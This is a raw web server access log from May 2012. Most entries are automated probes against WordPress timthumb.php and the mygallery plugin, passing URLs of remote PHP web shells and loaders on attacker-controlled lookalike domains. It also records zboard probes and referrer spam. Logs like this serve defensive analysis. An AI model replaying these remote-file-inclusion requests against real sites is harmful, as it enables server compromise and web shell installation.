78.137.37.171 - - [14/May/2012:07:17:17 +0200] "GET /logs/access_log HTTP/1.0" 200 1520579 "http://androidusplay.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:17:18 +0200] "GET /logs/access_log HTTP/1.0" 200 1521089 "http://androidusplay.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:07:17:18 +0200] "GET /logs/access_log HTTP/1.0" 200 1521320 "http://androidusplay.info/sitemap28.html" "Opera/7.54 (Windows NT 5.1; U) [pl]"
90.198.87.118 - - [14/May/2012:07:17:19 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
78.137.37.171 - - [14/May/2012:07:17:19 +0200] "GET /logs/access_log HTTP/1.0" 200 1521493 "http://androidusplay.info/sitemap28.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
78.137.37.171 - - [14/May/2012:07:17:19 +0200] "GET /logs/access_log HTTP/1.0" 200 1521959 "http://androidusplay.info/sitemap28.html" "Mozilla/4.79 [en] (Windows NT 5.0; U)"
90.198.87.118 - - [14/May/2012:07:17:20 +0200] "GET //wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
77.92.69.1 - - [14/May/2012:07:17:21 +0200] "GET /stats/log.keys.html////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:17:21 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:17:22 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:07:17:22 +0200] "GET //wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
46.45.138.202 - - [14/May/2012:07:18:02 +0200] "GET /stats//wp-content/themes/likehacker/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:07:18:04 +0200] "GET //wp-content/themes/likehacker/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:18:47 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:18:47 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:18:47 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:18:47 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:01 +0200] "GET /stats/log.keys.html////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:01 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:01 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:02 +0200] "GET /stats/log.keys.html////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:02 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:19:02 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET /stats//wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:19:10 +0200] "GET //wp-content/themes/TheProfessional/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:19:26 +0200] "GET /stats//wp-content/themes/striking/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:19:26 +0200] "GET //wp-content/themes/striking/includes/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:19:27 +0200] "GET /stats//wp-content/themes/striking/includes/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
212.67.205.187 - - [14/May/2012:07:19:27 +0200] "GET //wp-content/themes/striking/includes/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.141.35.196 - - [14/May/2012:07:19:39 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:07:19:40 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
67.128.149.182 - - [14/May/2012:07:20:22 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.128.149.182 - - [14/May/2012:07:20:22 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
90.198.87.118 - - [14/May/2012:07:21:04 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
91.149.157.176 - - [14/May/2012:07:21:04 +0200] "GET /stats//wp-content/themes/broadcast/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.149.157.176 - - [14/May/2012:07:21:05 +0200] "GET //wp-content/themes/broadcast/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
90.198.87.118 - - [14/May/2012:07:21:05 +0200] "GET /stats//wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:21:07 +0200] "GET //wp-content/themes/object/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:21:08 +0200] "GET //wp-content/themes/object/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
95.132.213.162 - - [14/May/2012:07:21:08 +0200] "GET /logs/access_log HTTP/1.0" 200 1531656 "http://androidenplay.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
67.228.195.2 - - [14/May/2012:07:21:12 +0200] "GET /stats/log.keys.html//wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:21:12 +0200] "GET /logs/access_log HTTP/1.0" 200 1531900 "http://androidenplay.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
67.228.195.2 - - [14/May/2012:07:21:14 +0200] "GET /stats/log.keys.html//wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:07:21:16 +0200] "GET //wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:21:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1532643 "http://androidenplay.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
67.228.195.2 - - [14/May/2012:07:21:18 +0200] "GET //wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.228.195.2 - - [14/May/2012:07:21:20 +0200] "GET /stats//wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/user.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:21:18 +0200] "GET /logs/access_log HTTP/1.0" 200 1533332 "http://androidenplay.info/sitemap217.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]"
67.228.195.2 - - [14/May/2012:07:21:22 +0200] "GET /stats//wp-content/themes/Aggregate/timthumb.php?src=http://picasa.com.hidro-ronda.com/both.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:07:21:22 +0200] "GET /logs/access_log HTTP/1.0" 200 1533816 "http://androidenplay.info/sitemap217.html" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
90.198.87.118 - - [14/May/2012:07:22:05 +0200] "GET /stats//wp-content/themes/postcard/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:22:07 +0200] "GET /stats//wp-content/themes/postcard/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:22:08 +0200] "GET //wp-content/themes/postcard/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:07:22:09 +0200] "GET //wp-content/themes/postcard/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
78.137.37.171 - - [14/May/2012:07:22:11 +0200] "GET /logs/access_log HTTP/1.0" 200 1535368 "http://androidusplay.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
78.137.37.171 - - [14/May/2012:07:22:12 +0200] "GET /logs/access_log HTTP/1.0" 200 1535561 "http://androidusplay.info/sitemap35.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
78.137.37.171 - - [14/May/2012:07:22:12 +0200] "GET /logs/access_log HTTP/1.0" 200 1535763 "http://androidusplay.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)"
78.137.37.171 - - [14/May/2012:07:22:13 +0200] "GET /logs/access_log HTTP/1.0" 200 1535959 "http://androidusplay.info/sitemap35.html" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)"
78.137.37.171 - - [14/May/2012:07:22:13 +0200] "GET /logs/access_log HTTP/1.0" 200 1536152 "http://androidusplay.info/sitemap35.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:07:22:49 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:06 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src= HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:06 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:06 +0200] "GET /stats//wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:07 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src= HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:07 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:07:23:07 +0200] "GET //wp-content/themes/magazinum/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
217.118.24.103 - - [14/May/2012:07:23:48 +0200] "GET /stats/zboard.php?id=OrnamenCrew HTTP/1.1" 404 298 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
217.118.24.103 - - [14/May/2012:07:23:49 +0200] "GET /zboard.php?id=OrnamenCrew HTTP/1.1" 404 292 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; ru) Presto/2.2.0"
46.45.138.202 - - [14/May/2012:07:23:52 +0200] "GET /stats//wp-content/themes/likehacker/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:07:23:53 +0200] "GET //wp-content/themes/likehacker/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:23:58 +0200] "GET /stats/log.keys.html////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:23:58 +0200] "GET ////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
77.92.69.1 - - [14/May/2012:07:23:59 +0200] "GET /stats////wp-content/themes/magazinum/scripts/timthumb.php?src=http://picasa.com.bptpastairegarden.com/cybercrime.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
94.142.134.155 - - [14/May/2012:07:23:58 +0200] "GET /stats/log.refs.html HTTP/1.0" 200 156206 "http://full-version.net/keywords2/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.142.134.155 - - [14/May/2012:07:23:59 +0200] "GET /stats/log.refs.html HTTP/1.0" 200 156206 "http://full-version.net/keywords2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.142.134.155 - - [14/May/2012:07:24:00 +0200] "GET /stats/log.refs.html HTTP/1.0" 200 156206 "http://full-version.net/keywords2/" "Opera/7.11 (Windows NT 5.1; U) [en]"
94.142.134.155 - - [14/May/2012:07:24:00 +0200] "GET /stats/log.refs.html HTTP/1.0" 200 156206 "http://full-version.net/keywords2/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; KKman2.0)"
94.142.134.155 - - [14/May/2012:07:24:01 +0200] "GET /stats/log.refs.html HTTP/1.0" 200 156206 "http://full-version.net/keywords2/" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
189.183.205.126 - - [14/May/2012:07:24:17 +0200] "GET /stats/log.keys.html HTTP/1.1" 200 20219 "http://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CIsBEBYwBg&url=http%3A%2F%2Fwww.grupposeit.it%2Fstats%2Flog.keys.html&ei=iJawT4WGKqKK2wWu-qnpCA&usg=AFQjCNEdsPvJCl4sw0wFhCD2yWzwW1UEoA" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19"
189.183.205.126 - - [14/May/2012:07:24:19 +0200] "GET /favicon.ico HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19"
184.173.6.208 - - [14/May/2012:07:24:28 +0200] "GET /stats//wp-content/themes/DelicateNews/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:07:24:29 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:07:24:41 +0200] "GET /stats/log.keys.html//wp-content/themes/DelicateNews/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:07:24:42 +0200] "GET //wp-content/themes/DelicateNews/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:07:24:43 +0200] "GET /stats//wp-content/themes/DelicateNews/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.150.216.211 - - [14/May/2012:07:24:50 +0200] "GET /stats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test?? HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:51 +0200] "GET /stats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:52 +0200] "GET /stats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:07:24:53 +0200] "GET /stats//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 350 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
